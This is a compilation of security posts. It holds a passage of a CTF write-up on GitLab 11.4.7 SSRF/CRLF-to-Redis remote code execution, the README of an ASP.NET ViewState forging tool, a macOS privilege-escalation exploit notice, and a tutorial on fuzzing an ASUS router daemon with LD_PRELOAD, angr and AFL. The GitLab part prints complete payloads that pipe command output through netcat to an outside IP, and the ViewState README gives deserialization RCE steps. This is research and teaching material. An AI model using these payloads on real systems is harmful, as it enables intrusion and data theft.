SSRF. Additionally, Instead of specifying the URL from the web application in the browser, we can use the Burp Suite's repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there and send the request. As you can see from the above image, we did get the request trapped in our netcat listener, and this confirms that there is SSRF which can talk to internal services, which in our case was the local netcat server on port 1234, which means that we can talk to the internal Redis server running on port 6379(specified in the docker-compose.yml). But what is Redis and how does GitLab use it? Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around. # quick test with redis root@gitlab:~ nc 127.0.0.1 6379 blah - ERR unknown command 'blah' set liveoverflow test +OK asd - ERR unknown command 'asd' get liveoverflow $4 test Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we try to send the HTTP request to Redis? Would Redis execute commands? Let's try. # http request test with redis root@gitlab:~ nc 127.0.0.1 6379 GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1 Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 User-Agent: git/2.18.1 Accept: */* Accept-Encoding: deflate, gzip Pragma: no-cache - Err wrong number of arguments for 'get' command root@gitlab:~ It gives us an error saying that there are wrong a number of arguments for the 'get' command which makes sense because from the earlier example, we know how 'get' command in Redis works. But, then we were dropped back to the shell, however from earlier, we saw that Redis doesn't quit even if there errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 is responsible for the Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue and Redis has implemented a "fix" for this. If the string "Host:" is present to the Redis server as a command, it'll know that this is an HTTP request trying to smuggle some Redis commands and stops the execution by closing the connection. Only if we could get our payload in-between the first line(GET /test...) and the second(Host: ...), we can make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands? *cough* CRLF *cough* Yes, remember the CRLF injection bug we saw in the Security Release and the commit history, we can use that! From the commit history's test cases, we can see that the injection is pretty straight forward. By merely adding newlines or URL encoding them would do the trick for example. http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To http://127.0.0.1:333/ test blah.git However, this didn't work out. Not sure why this doesn't work, but by changing the protocol from http:// to git:// makes it work. # Does work :) git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git # Expected to be Converted To git://127.0.0.1:333/ test blah.git Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on into creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability and smuggling one protocol(Redis) in another(git://) and get the Remote Code Execution. Fortunately, @jobertabma has already figured out the payload. Let's have a look at it. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec As you know, Redis can also be used to background job queues. These jobs are handled by Sidekiq, which is a background tasks processor for ruby. We can look at the list of sidekiq queues to see if there's anything that we can use. ... - [default, 1] - [pages, 1] - [system_hook_push, 1] - [propagate_service_template, 1] - [background_migration, 1] ... There's system_hook_push which can be used to handle the new jobs and it's the same one which is being used in the actual payload. Now to execute code/command, we need a class that would do it for us, think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb. class GitlabShellWorker include ApplicationWorker include Gitlab::ShellAdapter def perform(action, *arg) gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend end end As you can see, this is exactly the class we've been looking for. Now this GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, and in our case, it's the following. open('| COMMAND_TO_BE_EXECUTED').read In the actual payload, we push the queue onto system_hook_push and get the GitlabShellWorker class to run our commands. Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag. $ nc -lvp 1234 The final payload looks like the following. multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec Some points to note: In the payload above, redis commands need to have a whitespace before it in every line - no clue why. cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener. Added an extra exec command just so that the first one is executed properly and the second one would be concatenated with the next line instead of the first line. This is done so that important part of the payload won't break. The final import URL with the payload looks like this: # No Encoding git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ multi sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" exec exec /ssrf.git # URL encoded git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git Now if you send the "Repo by URL" request with this URL, we get the flag! Conclusion and Takeaways This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing one of the reported bugs was by Chaitin Tech (organizers), it was just a matter of 2-3 hours to solve this challenge. Do proper research before jumping into conclusions. It's all about the mindset. Resources docker-compose.yml Video Explanation LiveOverflow (and PwnFunction) wannabe hacker... Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
-
- 1
-
-
viewgen ASP.NET ViewState Generator viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files Requirements: Python 3 Installation pip3 install --upgrade -r requirements.txt or ./install.sh Usage $ viewstate -h usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND] [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG] [--dkey DKEY] [--dalg DALG] [-e] [payload] viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files positional arguments: payload ViewState payload (base 64 encoded) optional arguments: -h, --help show this help message and exit --webconfig WEBCONFIG automatically load keys and algorithms from a web.config file -m MODIFIER, --modifier MODIFIER VIEWSTATEGENERATOR value -c COMMAND, --command COMMAND Command to execute --decode decode a ViewState payload --guess guess signature and encryption mode for a given payload --check check if modifier and keys are correct for a given payload --vkey VKEY validation key --valg VALG validation algorithm --dkey DKEY decryption key --dalg DALG decryption algorithm -e, --encrypted ViewState is encrypted Examples $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" [+] ViewState (('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None) [+] Signature 7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6 [+] Signature match $ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk" r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" [+] ViewState is not encrypted [+] Signature algorithm: SHA1 $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" [!] ViewState is encrypted [+] Algorithm candidates: AES SHA1 DES/3DES SHA1 Achieving Remote Code Execution Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used. You can use the built-in command option (ysoserial.net based) to generate a payload: $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld" However, you can also generate it manually: 1 - Generate a payload with ysoserial.net: > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld" 2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp 3 - Generate the signed/encrypted payload: $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD 4 - Send a POST request with the generated ViewState to the same endpoint 5 - Profit ?? Thanks @orange_8361, the author of Why so Serials (HITCON CTF 2018) @infosec_au @smiegles BBAC CTF Writeups about this technique https://xz.aliyun.com/t/3019 https://cyku.tw/ctf-hitcon-2018-why-so-serials/ Talks about this technique https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints Sursa: https://github.com/0xACB/viewgen
-
Feedback Assistant root privilege escalation make run Tested on 10.11.x - 10.14.3 Sursa: https://github.com/ChiChou/sploits/tree/master/CVE-2019-8565
-
Modern Vulnerability Research Techniques on Embedded Systems This guide takes a look at vetting an embedded system (An ASUS RT-AC51U) using AFL, angr, a cross compiler, and some binary instrumentation without access to the physical device. We'll go from static firmware to thousands of executions per second of fuzzing on emulated code. (Sorry no 0days in this post) Asus is kind enough to provide the firmware for their devices online. Their firmware is generally a root file system packed into a single file using squashfs. As shown below, binwalk can run through this file system and identify the filesystem for us. $ binwalk RT-AC51U_3.0.0.4_380_8457-g43a391a.trx DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 64 0x40 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3551984 bytes 1174784 0x11ED00 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13158586 bytes, 1492 inodes, blocksize: 131072 bytes, created: 2019-01-09 11:06:39 Binwalk supports carving the filesystem out of the firmware image through the -Mre flags and will put the resulting root file system into a folder titled squash-fs $ ls 40 _40.extracted squashfs-root $ ls squashfs-root/ asus_jffs cifs2 etc_ro lib opt rom sys usr bin dev home mmc proc root sysroot var cifs1 etc jffs mnt ra_SKU sbin tmp www Motivation The LD_PRELOAD trick is a method of hooking symbols in a given binary to call your symbol, which the loader and placed before the reference to the original symbol. This can be used to hook function, like malloc and free in the case of libraries like libdheap, to call your own code and perform logging or other intrumentation based analysis. The general format requires compiling a small stub of c code and then running your binary like this: LD_PRELOAD=/Path/To/My/Library.so ./Run_Binary_As_Normal I wanted to try a trick I saw online to create a fast and effective fuzzer for network protocol fuzzing. This github gist shows a PoC of creating an LD_PRELOAD'd library that intercepts libc's call to main and replaces it with our own. #define _GNU_SOURCE #include <stdio.h> #include <dlfcn.h> /* Trampoline for the real main() */ static int (*main_orig)(int, char **, char **); /* Our fake main() that gets called by __libc_start_main() */ int main_hook(int argc, char **argv, char **envp) { // Do my stuff } /* * Wrapper for __libc_start_main() that replaces the real main * function with our hooked version. */ int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv, int (*init)(int, char **, char **), void (*fini)(void), void (*rtld_fini)(void), void *stack_end) { /* Save the real main function address */ main_orig = main; /* Find the real __libc_start_main()... */ typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main"); /* ... and call it with our custom main function */ return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end); } My thought was to then call a function inside of the now loaded binary starting from main. Any following calls or symbol look ups from the directly called function should resolve correctly because the main binary is loaded into memory! Defining a function prototype and then calling a function seemed to work. I can pull a function address out of a binary and jump to it with arbitrary arguments and the compiler abi will place to arguments into the runtime correctly to call the function. : /* Our fake main() that gets called by __libc_start_main() */ int main_hook(int argc, char **argv, char **envp) { char user_buf[512] = {"\x00"}; read(0, user_buf, 512); int (*do_thing_ptr)() = 0x401f30; int ret_val = (*do_thing_ptr)(user_buf, 0, 0); printf("Ret val %d\n",ret_val); return 0; } This process is very manual and slow... Let's speed it up! Setting up The extracted firmware executables are all mips little endian based and are interpreted through uClibc. $ file bin/busybox bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, stripped $ ls lib/ ld-uClibc.so.0 libdl.so.0 libnsl.so.0 libws.so libcrypt.so.0 libgcc_s.so.1 libpthread.so.0 modules libc.so.0 libiw.so.29 librt.so.0 libdisk.so libm.so.0 libstdc++.so.6 DockCross does not support uClibc cross compiling yet so I needed to build my own cross compilers. Using buildroot I created a uClibc cross compiler for my Ubuntu 18.04 machine. To save time in the future I've posted this toolchain and a couple others online here. This toolchain enables quick cross compiling of our LD_PRELOADed libraries. The target is the asusdiscovery service. There has already been a CVE for it and it proves to be hard to fuzz manually. The discovery service periodically sends packets out across the network, scanning for other ASUS routers. When another ASUS router sees this discover packet, it responds with it's information and the discovery service parses it. These response-based network services can be hard to fuzz through traditional network fuzzing tools like BooFuzz. So we're going to find where it parses the response and fuzz that logic directly with our new-found LD_PRELOAD tricks. Pulling symbol information from this binary yields a quick tell to which function does the parsing ParseASUSDiscoveryPackage: $ readelf -s usr/sbin/asusdiscovery Symbol table '.dynsym' contains 85 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 0040128c 236 FUNC GLOBAL DEFAULT 10 safe_fread 2: 00414020 0 NOTYPE GLOBAL DEFAULT 18 _fdata 3: 00000001 0 SECTION GLOBAL DEFAULT ABS _DYNAMIC_LINKING 4: 0041c050 0 NOTYPE GLOBAL DEFAULT ABS _gp ..............SNIP.................... 33: 004141b0 4 OBJECT GLOBAL DEFAULT 22 a_bEndApp 34: 00402cec 328 FUNC GLOBAL DEFAULT 10 ParseASUSDiscoveryPackage 35: 00403860 0 FUNC GLOBAL DEFAULT UND sprintf ...............SNIP..................... With this symbol in mind we can open the binary up in Ghidra and have the decompiler give us a rough idea of how it's working: undefined4 ParseASUSDiscoveryPackage(int iParm1) { ssize_t sVar1; socklen_t local_228; undefined4 local_224; undefined4 local_220; undefined4 local_21c; undefined4 local_218; undefined auStack532 [516]; myAsusDiscoveryDebugPrint("----------ParseASUSDiscoveryPackage Start----------"); if (a_bEndApp != 0) { myAsusDiscoveryDebugPrint("a_bEndApp = true"); return 0; } local_228 = 0x10; memset(auStack532,0,0x200); sVar1 = recvfrom(iParm1,auStack532,0x200,0,(sockaddr *)&local_224,&local_228); if (0 < sVar1) { PROCESS_UNPACK_GET_INFO(auStack532,local_224,local_220,local_21c,local_218); return 1; } myAsusDiscoveryDebugPrint("recvfrom function failed"); return 0; } The function appears to be instantiating a 512 byte buffer and reading from a given network file descriptor through the recvfrom function. A quick visit to recvfrom's manpage reveals that the second argument going into recvfrom will contain the network input, the input we can control. RECV(2) Linux Programmer's Manual RECV(2) NAME recv, recvfrom, recvmsg - receive a message from a socket SYNOPSIS #include <sys/types.h> #include <sys/socket.h> ssize_t recv(int sockfd, void *buf, size_t len, int flags); ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags, struct sockaddr *src_addr, socklen_t *addrlen); This user input is immediately passed to the PROCESS_UNPACK_GET_INFO function. This function in responsible for parsing the user input and relaying that information to the router. Opening the function in ghidra reveals a large parsing function. This looks perfect for fuzzing! aa The next step is interacting with the function and providing input into that first argument. The first step towards running this as an independent function is recovering the function prototype. Ghidra shows the defined function prototype as below. void PROCESS_UNPACK_GET_INFO(char *pcParm1,undefined4 uParm2,in_addr iParm3) Using stub-builder you can take this information Instrumenting asusdiscover Similarly to the PoC of the LD_PRELOAD main hook shown above, I needed to hook the main function. For uClibc that function is __uClibc_main. Using the same trick as above, we'll define a function prototype for the function we want to call, then hook uClibc's main function and then jump directly to the function we want to call with our arguments. To make this process easier, I created a tool to identify function prototypes and slot them into templated c code. The current iteration of stub-builder will accept a file and a given function to instrument. The tool is imperfect and will use radare2 to identify (often wrongly) function prototypes and place them into the c stub. $ stub_builder -h usage: stub_builder [-h] --File FILE {hardcode,recover} ... positional arguments: {hardcode,recover} Hardcode or automatically use prototypes and addresses hardcode Use absolute offsets and prototypes recover Use radare2 to recover function address and prototype optional arguments: -h, --help show this help message and exit --File FILE, -F FILE ELF executable to create stub from An example for the command can be seen below. The stub builder uses radare2 for it's function recovery and fails to identify the first argument as a char* so we need to fixup the main_hook.c. $ stub_builder -F usr/sbin/asusdiscovery recover name PROCESS_UNPACK_GET_INFO [+] Modify main_hook.c to call instrumented function [+] Compile with "gcc main_hook.c -o main_hook.so -fPIC -shared -ldl" [+] Hook with: LD_PRELOAD=./main_hook.so ./usr/sbin/asusdiscovery [+] Created main_hook.c Hardcoded values can be inserted instead. The below command supplies the address, argument prototype and the expected return type: $ stub_builder -F usr/sbin/asusdiscovery hardcode 0x00401f30 "(char *, int, int)" "int" #define _GNU_SOURCE #include <stdio.h> #include <dlfcn.h> //gcc main_hook.c -o main_hook.so -fPIC -shared -ldl /* Trampoline for the real main() */ static int (*main_orig)(int, char **, char **); /* Our fake main() that gets called by __libc_start_main() */ int main_hook(int argc, char **argv, char **envp) { //<arg declarations here> char user_buf[512] = {"\x00"}; //scanf("%512s", user_buf); read(0, user_buf, 512); int (*do_thing_ptr)(char *, int, int) = 0x401f30; int ret_val = (*do_thing_ptr)(user_buf, 0, 0); printf("Ret val %d\n",ret_val); return 0; } //uClibc_main /* * Wrapper for __libc_start_main() that replaces the real main * function with our hooked version. */ int __uClibc_main( int (*main)(int, char **, char **), int argc, char **argv, int (*init)(int, char **, char **), void (*fini)(void), void (*rtld_fini)(void), void *stack_end) { /* Save the real main function address */ main_orig = main; /* Find the real __libc_start_main()... */ typeof(&__uClibc_main) orig = dlsym(RTLD_NEXT, "__uClibc_main"); /* ... and call it with our custom main function */ return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end); } The code above will accept input from STDIN and pass it into the parsing function directly. This enable us to test and get return values of the functions without any networking compoonents required. Running the code Cross compiling the shared object using the provided cross compilers is shown below. The resulting file will be named main_hook.so t$ /opt/cross-compile/mipsel-linux-uclibc/bin/mipsel-buildroot-linux-uclibc-gcc main_hook.c -o main_hook.so -fPIC -shared -ldl Using this library is shown below and with my toolchain it doesn't link the libdl library and will result in the error below: $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/main_hook.so ./usr/sbin/asusdiscovery ./usr/sbin/asusdiscovery: can't resolve symbol 'dlsym' Adding the libdl library to the LD_PRELOAD fixes this problem and resolves the dlsym function. $ qemu-mipsel -L /home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery abcd Ret val 4 We now have the binary running and it's accepting our input and passing it directly to the function. The next stage is generating a set of valid input data to seed our fuzzer with. Generating valid input for a test corpus Sending in random strings of "A"s will not yield new discovered paths through the parsing function. Looking at the function decompilation we can see there is a quick check performed in a funciton titled UnpackGetInfo_NEW . This is the first function we need to look at, to determine if there are any early exits from initial parses. memset(&local_320,0,0xf8); memset(&uStack1000,0,200); iVar28 = UnpackGetInfo_NEW(pcParm1,&local_320,&uStack1000); iVar39 = a_GetRouterCount; This function first checks for a set of magic bytes before continueing. It's looking for "\x0c\x16\x00\x1f" to be the first bytes in network input. Without these magic bytes it will exit early and indicate through it's return code to discard the input. int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3) { undefined4 uVar1; undefined4 uVar2; undefined4 uVar3; undefined4 *puVar4; undefined4 *puVar5; undefined4 *puVar6; if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) { return 1; } Supplying this magic value immediatly returns a different result when running the binary: $ python2 -c 'print "\x0c\x16\x1f\x00" + "A"*100' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery Ret val 1 The function returns more than just a single return value based on the parse or unpack. There appears to be checks on lines 12, 15, 32, 33 and returns a result based on the input on line 50. int UnpackGetInfo_NEW(char *user_input,undefined4 *param_2,undefined4 *param_3) { undefined4 uVar1; undefined4 uVar2; undefined4 uVar3; undefined4 *puVar4; undefined4 *puVar5; undefined4 *puVar6; if (((*user_input != '\f') || (user_input[1] != 0x16)) || (*(short *)(user_input + 2) != 0x1f)) { return 1; } puVar6 = (undefined4 *)(user_input + 8); do { puVar5 = puVar6; puVar4 = param_2; uVar1 = puVar5[1]; uVar2 = puVar5[2]; uVar3 = puVar5[3]; *puVar4 = *puVar5; puVar4[1] = uVar1; puVar4[2] = uVar2; puVar6 = puVar5 + 4; puVar4[3] = uVar3; param_2 = puVar4 + 4; } while (puVar6 != (undefined4 *)(user_input + 0xf8)); uVar1 = puVar5[5]; puVar4[4] = *puVar6; puVar4[5] = uVar1; if ((*(short *)(user_input + 0x110) == -0x7f7e) && (puVar6 = (undefined4 *)(user_input + 0x110), (user_input[0x112] & 1U) != 0)) { do { puVar5 = puVar6; puVar4 = param_3; uVar1 = puVar5[1]; uVar2 = puVar5[2]; uVar3 = puVar5[3]; *puVar4 = *puVar5; puVar4[1] = uVar1; puVar4[2] = uVar2; puVar6 = puVar5 + 4; puVar4[3] = uVar3; param_3 = puVar4 + 4; } while (puVar6 != (undefined4 *)(user_input + 0x1d0)); uVar1 = puVar5[5]; puVar4[4] = *puVar6; puVar4[5] = uVar1; return (uint)((user_input[0x112] & 0x10U) != 0) + 5; } return 0; } This is a perfect time to breakout angr to create a valid input to hit line 50! The following code will create a 300 byte symbolic buffer and have angr solve the constraints required to pass each check in the unpacking function to yield all potential return results. We are intersted in the analysis path that reached the furthest part of the parsing function. The script below will print out each path end address and the required input to reach that path. import angr import angr.sim_options as so import claripy symbol = "UnpackGetInfo_NEW" # Create a project with history tracking p = angr.Project('/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery') extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY} # User input will be 300 symbolic bytes user_arg = claripy.BVS("user_arg", 300*8) # State starts at function address start_addr = p.loader.find_symbol(symbol).rebased_addr state = p.factory.blank_state(addr=start_addr, add_options=extras) # Store symbolic user_input buffer state.memory.store(0x100000, user_arg) state.regs.a0 = 0x100000 # Run to exhaustion simgr = p.factory.simgr(state) simgr.explore() # Print each path and the inputs required for path in simgr.unconstrained: print("{} : {}".format(path,hex([x for x in path.history.bbl_addrs][-1]))) u_input = path.solver.eval(user_arg, cast_to=bytes) print(u_input) One of the outputs is shown below, and this input can then be sent back into the program through the above qemu command to validate that it passes the checks. <SimState @ <BV32 reg_ra_51_32{UNINITIALIZED}>> : 0x401c4c b'\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ### Running the input $ printf '\x0c\x16\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | qemu-mipsel -L . -E LD_PRELOAD=/lib/libdl.so.0:/main_hook.so ./usr/sbin/asusdiscovery Ret val 1 I've put each of these inputs into individual files for AFL to read from later. $ ls afl_input/ test_case1 test_case2 test_case3 test_case4 test_case5 Fuzzing the function Using the AFL build process outlined here will provide AFL with qemu mode which will fuzz asusdiscovery with the script: #!/bin/bash export "QEMU_SET_ENV=LD_PRELOAD=/lib/libdl.so.0:/main_hook.so" export "QEMU_LD_PREFIX=/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root" export "AFL_INST_LIBS=1" #export "AFL_NO_FORKSRV=1" BINARY="/home/caffix/firmware/asus/RT-AC51U/ext_fw/squashfs-root/usr/sbin/asusdiscovery" afl-fuzz -i afl_input -o output -m none -Q $BINARY You will get some incredibly slow fuzzing at about 1-2 execution per second. The afl fork server is taking way to long to spawn off newly forked processes. Adding the AFL_NO_FORKSRV=1 will prevent AFL from creating a forkserver just before main and forking off new processes. For this type of hooking and emulation it runs much faster at about 85 executions per second: We can do better... Specifically we can use Abiondo's fork of AFL that he describes his blog post here. Abiondo implemented an idea for QEMU that is quoted at speeding up the qemu emulation speed on a scale of 3 to 4 times. That should put us at 300 or 400 executions per second. My idea was to move the instrumentation into the translated code by injecting a snippet of TCG IR at the beginning of every TB. This way, the instrumentation becomes part of the emulated program, so we don’t need to go back into the emulator at every block, and we can re-enable chaining. Downloading and running the fork of AFL follows the exact same build process: git clone https://github.com/abiondo/afl.git cd afl make cd qemu_mode export CPU_TARGET=mipsel ./build_qemu_support.sh Rerunning the previous fuzzing command script WITHOUT the AFL_NO_FORKSRV environment variable produces some 